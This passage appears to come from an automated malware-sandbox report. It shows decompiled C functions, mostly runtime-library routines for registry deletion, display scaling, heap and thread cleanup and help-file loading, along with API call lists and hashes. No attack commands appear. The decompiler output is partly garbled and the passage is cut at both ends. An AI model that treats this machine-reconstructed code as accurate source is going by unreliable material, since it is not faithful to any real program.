                                                      									goto L21;
                                                      								} else {
                                                      									goto L15;
                                                      								}
                                                      							}
                                                      							goto L22;
                                                      						case 8:
                                                      							__eax = E0040EA5E();
                                                      							__ecx = __ebp + 0xc;
                                                      							__eax = E0040320E(__ebp + 0xc, __eax);
                                                      							_t44 = __ebp - 4;
                                                      							 *_t44 =  *(__ebp - 4) & 0x00000000;
                                                      							__eflags =  *_t44;
                                                      							L19:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							__ecx = __ebp + 0xc;
                                                      							 *__esi = 8;
                                                      							__eax = E0040A240(__ebp + 0xc);
                                                      							__ecx =  *(__ebp + 0xc);
                                                      							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                      							 *(__esi + 8) = __eax;
                                                      							__eax = E00403036( *(__ebp + 0xc) + 0xfffffff0, __edx);
                                                      							L4:
                                                      							_t56 = 1;
                                                      							goto L22;
                                                      						case 9:
                                                      							goto L21;
                                                      					}
                                                      				}
                                                      				L22:
                                                      				return E0041F7C2(_t56);
                                                      			}







                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00412962
                                                      • SendMessageA.USER32(?,00000138,?,?), ref: 004129DA
                                                      • GetBkColor.GDI32(?), ref: 004129E3
                                                      • GetTextColor.GDI32(?), ref: 004129EF
                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 00412A81
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                      • String ID:
                                                      • API String ID: 187318432-0
                                                      • Opcode ID: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
                                                      • Instruction ID: 105b4171879299afdcc85ecd79fbceca975293f7ace257aaf3855ae8da3ba32c
                                                      • Opcode Fuzzy Hash: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
                                                      • Instruction Fuzzy Hash: 8E419D71500305DFCB20DF65C944ADE77B0FF04314F10896EE896AB3A1D7B8A9A1CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00405482(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t25;
                                                      				signed int _t30;
                                                      				void* _t32;
                                                      				signed int _t34;
                                                      				signed int _t42;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				char** _t54;
                                                      				intOrPtr _t55;
                                                      				intOrPtr _t58;
                                                      				char* _t59;
                                                      				void* _t61;
                                                      
                                                      				_t42 = __ebx;
                                                      				_t59 = _t61 - 0x104;
                                                      				_t25 =  *0x443590; // 0x8ffedb05
                                                      				_t59[0x108] = _t25 ^ _t59;
                                                      				_push(0x18);
                                                      				E0041F71D(E00431D33, __ebx, __edi, __esi);
                                                      				_t54 = _t59[0x118];
                                                      				_t44 = _t59[0x114];
                                                      				_t52 = _t59 - 0x18;
                                                      				 *(_t59 - 0x20) = _t44;
                                                      				 *(_t59 - 0x1c) = _t54;
                                                      				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                      				_t57 = _t30;
                                                      				if(_t30 == 0) {
                                                      					while(1) {
                                                      						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                      						_t57 = _t34;
                                                      						_t66 = _t57;
                                                      						if(_t57 != 0) {
                                                      							break;
                                                      						}
                                                      						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                      						_push(_t59);
                                                      						E00403667(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                      						 *(_t59 - 4) = 1;
                                                      						_t57 = E00405482(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                      						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                      						 *(_t59 - 4) = 0;
                                                      						E00403036( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                      						if(_t42 == 0) {
                                                      							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					__eflags = _t57 - 0x103;
                                                      					if(_t57 == 0x103) {
                                                      						L6:
                                                      						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                      					} else {
                                                      						__eflags = _t57 - 0x3f2;
                                                      						if(_t57 == 0x3f2) {
                                                      							goto L6;
                                                      						}
                                                      					}
                                                      					RegCloseKey( *(_t59 - 0x18));
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                      				_pop(_t55);
                                                      				_pop(_t58);
                                                      				_pop(_t43);
                                                      				_t32 = E0041E5DF(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                      				__eflags =  &(_t59[0x10c]);
                                                      				return _t32;
                                                      			}
















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 004054A1
                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004054C0
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 004054DE
                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00405559
                                                      • RegCloseKey.ADVAPI32(?), ref: 00405564
                                                        • Part of subcall function 00403667: __EH_prolog3.LIBCMT ref: 0040366E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                      • String ID:
                                                      • API String ID: 301487041-0
                                                      • Opcode ID: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
                                                      • Instruction ID: b1f98a2856fb891a4ad2f1730a2dfbfc327df959dd0772622e21178d5af673db
                                                      • Opcode Fuzzy Hash: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
                                                      • Instruction Fuzzy Hash: 7921CC76900219ABDB25DFA4CC41AEEB7B4FB08314F10013AED95B73D0DB385E448BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A5D4(intOrPtr* __ecx, int* _a4) {
                                                      				int _v8;
                                                      				int _t12;
                                                      				int _t14;
                                                      				int _t22;
                                                      				int _t32;
                                                      				int* _t36;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				if(__ecx == 0) {
                                                      					_t22 =  *0x446590; // 0x60
                                                      					_t12 =  *0x446594; // 0x60
                                                      					goto L6;
                                                      				} else {
                                                      					_t32 = GetMapMode( *(__ecx + 8));
                                                      					if(_t32 >= 7 || _t32 == 1) {
                                                      						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                      						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                      						L6:
                                                      						_t36 = _a4;
                                                      						_v8 = _t12;
                                                      						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                      						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                      						_t36[1] = _t14;
                                                      					} else {
                                                      						_push(3);
                                                      						 *((intOrPtr*)( *__ecx + 0x34))();
                                                      						E0040E4C1(__ecx, _a4);
                                                      						_push(_t32);
                                                      						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                      					}
                                                      				}
                                                      				return _t14;
                                                      			}









                                                      APIs
                                                      • GetMapMode.GDI32(?,?,?,?,?,?,004142E1,?,00000000,0000001C,00414C4F,?,?,?,?,?), ref: 0041A5E4
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0041A61E
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0041A627
                                                        • Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E501
                                                        • Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E51E
                                                      • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0041A64B
                                                      • MulDiv.KERNEL32(00000000,000009EC,?), ref: 0041A656
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Mode
                                                      • String ID:
                                                      • API String ID: 696222070-0
                                                      • Opcode ID: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
                                                      • Instruction ID: b67f60aca54f694c5be954c7caf55a9921f0b6cf90a1da25102bc38903e6d2d6
                                                      • Opcode Fuzzy Hash: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
                                                      • Instruction Fuzzy Hash: 22112135700A00AFDB21AF56CC44C5EBFF9EF89310B15482AFA8697360C775AC528F95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A662(intOrPtr* __ecx, int* _a4) {
                                                      				int _v8;
                                                      				int _t12;
                                                      				int _t14;
                                                      				int _t30;
                                                      				int _t33;
                                                      				int* _t36;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				if(__ecx == 0) {
                                                      					_t30 =  *0x446590; // 0x60
                                                      					_t12 =  *0x446594; // 0x60
                                                      					goto L6;
                                                      				} else {
                                                      					_t33 = GetMapMode( *(__ecx + 8));
                                                      					if(_t33 >= 7 || _t33 == 1) {
                                                      						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                      						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                      						L6:
                                                      						_t36 = _a4;
                                                      						_v8 = _t12;
                                                      						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                      						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
                                                      						_t36[1] = _t14;
                                                      					} else {
                                                      						_push(3);
                                                      						 *((intOrPtr*)( *__ecx + 0x34))();
                                                      						E0040E458(__ecx, _a4);
                                                      						_push(_t33);
                                                      						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                      					}
                                                      				}
                                                      				return _t14;
                                                      			}









                                                      APIs
                                                      • GetMapMode.GDI32(?,00000000,?,?,?,?,00414325,?,?,?,?,?,?), ref: 0041A672
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0041A6AC
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0041A6B5
                                                        • Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E498
                                                        • Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E4B5
                                                      • MulDiv.KERNEL32(?,00000060,000009EC), ref: 0041A6D9
                                                      • MulDiv.KERNEL32(00000000,?,000009EC), ref: 0041A6E4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Mode
                                                      • String ID:
                                                      • API String ID: 696222070-0
                                                      • Opcode ID: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
                                                      • Instruction ID: d964a8700f0a9f0458d188cf6e9d936817c2b57de253648240f01c4d5d8773f5
                                                      • Opcode Fuzzy Hash: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
                                                      • Instruction Fuzzy Hash: 2811EC36200600AFDB21AF56CC4485EBBA9EF89750B15042AEA8597360C735AC618F99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E0041E18A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr* _t10;
                                                      				intOrPtr _t13;
                                                      				intOrPtr _t23;
                                                      				void* _t25;
                                                      
                                                      				_push(0xc);
                                                      				_push(0x43f4c8);
                                                      				_t8 = E00421418(__ebx, __edi, __esi);
                                                      				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                      				if(_t23 == 0) {
                                                      					L9:
                                                      					return E0042145D(_t8);
                                                      				}
                                                      				if( *0x448500 != 3) {
                                                      					_push(_t23);
                                                      					L7:
                                                      					_t8 = HeapFree( *0x4468d0, 0, ??);
                                                      					_t31 = _t8;
                                                      					if(_t8 == 0) {
                                                      						_t10 = E0041F8D2(_t31);
                                                      						 *_t10 = E0041F897(GetLastError());
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				E00422E2D(4);
                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                      				_t13 = E00422EA6(_t23);
                                                      				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                      				if(_t13 != 0) {
                                                      					_push(_t23);
                                                      					_push(_t13);
                                                      					E00422ED1();
                                                      				}
                                                      				 *(_t25 - 4) = 0xfffffffe;
                                                      				_t8 = E0041E1E0();
                                                      				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                      					goto L9;
                                                      				} else {
                                                      					_push( *((intOrPtr*)(_t25 + 8)));
                                                      					goto L7;
                                                      				}
                                                      			}







                                                      APIs
                                                      • __lock.LIBCMT ref: 0041E1A8
                                                        • Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
                                                        • Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
                                                        • Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55
                                                      • ___sbh_find_block.LIBCMT ref: 0041E1B3
                                                      • ___sbh_free_block.LIBCMT ref: 0041E1C2
                                                      • HeapFree.KERNEL32(00000000,00401B31,0043F4C8,0000000C,00422E0E,00000000,0043F5F0,0000000C,00422E46,00401B31,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C), ref: 0041E1F2
                                                      • GetLastError.KERNEL32(?,?,0041F8D7,0041ED60,?,00401B31,00009618), ref: 0041E203
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 2714421763-0
                                                      • Opcode ID: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
                                                      • Instruction ID: 4d9d38d2205d8855a1f8cf274a38df5ed94e4e206fa5bf874766943ed1e83e44
                                                      • Opcode Fuzzy Hash: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
                                                      • Instruction Fuzzy Hash: E801A775A01211B6DF207BB3AC05BCF3B64AF12768F50016FF804A6191CF3C89819A5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040F63E(long* __ecx) {
                                                      				intOrPtr _t4;
                                                      				long _t5;
                                                      				void* _t6;
                                                      				void* _t13;
                                                      				intOrPtr _t14;
                                                      				long* _t15;
                                                      
                                                      				_t15 = __ecx;
                                                      				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                                                      				if(_t4 != 0) {
                                                      					do {
                                                      						_t14 =  *((intOrPtr*)(_t4 + 4));
                                                      						E0040F496(__ecx, _t4, 0);
                                                      						_t4 = _t14;
                                                      					} while (_t14 != 0);
                                                      				}
                                                      				_t5 =  *_t15;
                                                      				if(_t5 != 0xffffffff) {
                                                      					TlsFree(_t5);
                                                      				}
                                                      				_t6 = _t15[4];
                                                      				if(_t6 != 0) {
                                                      					_t13 = GlobalHandle(_t6);
                                                      					GlobalUnlock(_t13);
                                                      					_t6 = GlobalFree(_t13);
                                                      				}
                                                      				DeleteCriticalSection( &(_t15[7]));
                                                      				return _t6;
                                                      			}










                                                      APIs
                                                      • TlsFree.KERNEL32(?), ref: 0040F664
                                                      • GlobalHandle.KERNEL32(?), ref: 0040F672
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040F67B
                                                      • GlobalFree.KERNEL32 ref: 0040F682
                                                      • DeleteCriticalSection.KERNEL32 ref: 0040F68C
                                                        • Part of subcall function 0040F496: EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
                                                        • Part of subcall function 0040F496: LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
                                                        • Part of subcall function 0040F496: LocalFree.KERNEL32(?), ref: 0040F50C
                                                        • Part of subcall function 0040F496: TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E
                                                      Similarity
                                                      • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                      • String ID:
                                                      • API String ID: 1549993015-0
                                                      • Opcode ID: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
                                                      • Instruction ID: 36f76e17889f8822f579ccbac83d4f0dccc08baf364ee29f70bbc8cc12851e33
                                                      • Opcode Fuzzy Hash: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
                                                      • Instruction Fuzzy Hash: 4BF054312006005BD7319B79AC4CAAB76A9AFE57117160A7AF815E36E0DB39EC06466C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E0040AD88(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr _v0;
                                                      				intOrPtr _v4;
                                                      				void* __esi;
                                                      				struct HINSTANCE__* _t16;
                                                      				_Unknown_base(*)()* _t17;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				void* _t28;
                                                      
                                                      				_t28 = __eflags;
                                                      				_t24 = __edi;
                                                      				_t21 = __ebx;
                                                      				E0040FA7F(__ebx, _t25, __ebp, 0xc);
                                                      				_push(E0040A257);
                                                      				_t26 = E0040F0A3(__ebx, 0x446410, __edi, _t25, _t28);
                                                      				_t29 = _t26;
                                                      				if(_t26 == 0) {
                                                      					E004037E3(_t21, 0x446410, __edi, _t26, _t29);
                                                      				}
                                                      				_t30 =  *(_t26 + 8);
                                                      				if( *(_t26 + 8) != 0) {
                                                      					L7:
                                                      					E0040FAEC(0xc);
                                                      					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                      				} else {
                                                      					_push("hhctrl.ocx");
                                                      					_t16 = E004088A1(_t21, 0x446410, _t24, _t26, _t30);
                                                      					 *(_t26 + 4) = _t16;
                                                      					if(_t16 != 0) {
                                                      						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                      						__eflags = _t17;
                                                      						 *(_t26 + 8) = _t17;
                                                      						if(_t17 != 0) {
                                                      							goto L7;
                                                      						}
                                                      						FreeLibrary( *(_t26 + 4));
                                                      						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      			}












                                                      APIs
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                        • Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
                                                        • Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                        • Part of subcall function 0040F0A3: __EH_prolog3_catch.LIBCMT ref: 0040F0AA
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0040ADCC
                                                      • FreeLibrary.KERNEL32(?), ref: 0040ADDC
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                      • API String ID: 2853499158-63838506
                                                      • Opcode ID: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
                                                      • Instruction ID: 6b69f8713619981bd23f7052f209581d6a0912bbed647a4ce728f8c290688269
                                                      • Opcode Fuzzy Hash: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
                                                      • Instruction Fuzzy Hash: D501D1312447029BDB20BB61DD0AB4B7AD5AF54B1AF10883FF04AB19D0C77D88209A1B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CD6B(intOrPtr _a4) {
                                                      				intOrPtr _t2;
                                                      				struct _CRITICAL_SECTION* _t3;
                                                      
                                                      				_t2 = _a4;
                                                      				if(_t2 < 0x4442e0 || _t2 > 0x444540) {
                                                      					_t3 = _t2 + 0x20;
                                                      					EnterCriticalSection(_t3);
                                                      					return _t3;
                                                      				} else {
                                                      					return E00422E2D((_t2 - 0x4442e0 >> 5) + 0x10);
                                                      				}
                                                      			}






                                                      APIs
                                                      • __lock.LIBCMT ref: 0042CD88
                                                        • Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
                                                        • Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
                                                        • Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55
                                                      • EnterCriticalSection.KERNEL32(?,00430745,?,0043FA38,0000000C,0042DD98,004442E0,0043F9D0,00000010,0042CD5E), ref: 0042CD93
                                                      Similarity
                                                      • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                      • String ID: @ED$BD
                                                      • API String ID: 3996875869-3832678117
                                                      • Opcode ID: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
                                                      • Instruction ID: bb51faa7ff948615fe3c82eba944c30b4e22731db9a053301acaced63cb2b748
                                                      • Opcode Fuzzy Hash: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
                                                      • Instruction Fuzzy Hash: 9FD022FA71012027EF2816B2BECAB1E2608D2C03423A54E3BF502C6281CE2DEAC1100C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0042AD70() {
                                                      				signed long long _v12;
                                                      				signed int _v20;
                                                      				signed long long _v28;
                                                      				signed char _t8;
                                                      
                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                      				if(_t8 == 0) {
                                                      					L6:
                                                      					_v20 =  *0x438170;
                                                      					_v28 =  *0x438168;
                                                      					asm("fsubr qword [ebp-0x18]");
                                                      					_v12 = _v28 / _v20 * _v20;
                                                      					asm("fld1");
                                                      					asm("fcomp qword [ebp-0x8]");
                                                      					asm("fnstsw ax");
                                                      					if((_t8 & 0x00000005) != 0) {
                                                      						return 0;
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                      					if(__eax == 0) {
                                                      						goto L6;
                                                      					} else {
                                                      						_push(0);
                                                      						return __eax;
                                                      					}
                                                      				}
                                                      			}








                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0042244D), ref: 0042AD75
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042AD85
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      • Opcode ID: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
                                                      • Instruction ID: cd959e317abe6be5cb1291d7da4cfedc1d6fa2a895f225a505106cb1dce581d7
                                                      • Opcode Fuzzy Hash: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
                                                      • Instruction Fuzzy Hash: 64C0809035131357DD1117B1AC0D71B301D5B44B83F6024567809E45C0DE5CE010442F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E0041733F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
                                                      				signed int _v4;
                                                      				intOrPtr _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				intOrPtr _v36;
                                                      				void* _v40;
                                                      				char _v124;
                                                      				void* _v168;
                                                      				void* _v176;
                                                      				void* _v184;
                                                      				void* _v196;
                                                      				signed int* __ebp;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				signed int _t139;
                                                      				void* _t140;
                                                      				intOrPtr* _t145;
                                                      				intOrPtr* _t148;
                                                      				signed int _t149;
                                                      				signed int _t151;
                                                      				intOrPtr* _t152;
                                                      				void* _t154;
                                                      				intOrPtr* _t158;
                                                      				signed int _t163;
                                                      				intOrPtr _t164;
                                                      				intOrPtr* _t166;
                                                      				intOrPtr* _t168;
                                                      				void* _t179;
                                                      				intOrPtr _t182;
                                                      				signed int _t183;
                                                      				signed int _t185;
                                                      				signed int* _t186;
                                                      				void* _t187;
                                                      				intOrPtr* _t188;
                                                      				signed int _t202;
                                                      				signed int _t204;
                                                      				intOrPtr _t214;
                                                      				intOrPtr _t220;
                                                      				intOrPtr* _t222;
                                                      				intOrPtr _t223;
                                                      				signed int _t225;
                                                      				void* _t228;
                                                      				void* _t229;
                                                      				void* _t230;
                                                      				void* _t231;
                                                      				void* _t232;
                                                      
                                                      				_t188 = __ecx;
                                                      				_t181 = __ebx;
                                                      				_t232 = _t231 - 0x74;
                                                      				_t225 =  &_v124;
                                                      				_t132 =  *0x443590; // 0x8ffedb05
                                                      				_a116 = _t132 ^ _t225;
                                                      				_push(0x1c);
                                                      				E0041F6EA(E004331D4, __ebx, __edi, __esi);
                                                      				_t222 = __ecx;
                                                      				_v16 =  *((intOrPtr*)(__ecx + 0x14));
                                                      				_a4 =  *((intOrPtr*)(__ecx + 0x10));
